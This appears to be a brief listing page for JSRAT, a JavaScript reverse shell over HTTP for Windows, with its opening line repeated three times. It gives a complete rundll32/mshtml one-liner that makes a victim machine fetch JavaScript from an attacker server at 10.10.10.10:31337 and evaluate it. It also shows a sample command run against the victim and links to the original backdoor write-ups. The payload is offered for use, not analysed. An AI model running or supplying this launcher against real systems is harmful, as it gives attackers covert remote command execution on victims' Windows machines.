JSRAT is a Simple JS Reverse Shell over HTTP for Windows.

JSRAT is a Simple JS Reverse Shell over HTTP for Windows.

JSRAT is a Simple JS Reverse Shell over HTTP for Windows, We run web server and then execute commands against the connecting Client/Victim. so you can now run the attack server from any OS instead of being limited to a Windows OS with Powershell enabled.jsrat
Command to Launch JS Reverse Shell from Client||Victim Windows box:
+ rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;document.write();h=new%20ActiveXObject(“WinHttp.WinHttpRequest.5.1”);h.Open(“GET”,”http://10.10.10.10:31337/connect”,false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject(“WScript.Shell”).Run(“cmd /c taskkill /f /im rundll32.exe”,0,true);}
+ $(JSRat)> cmd /c dir C:\

References & Original Project:
+ http://en.wooyun.io/2016/02/04/42.html
+ http://en.wooyun.io/2016/01/18/JavaScript-Backdoor.html
+ https://gist.github.com/subTee/f1603fa5c15d5f8825c0

Usage:

Source: https://github.com/Hood3dRob1n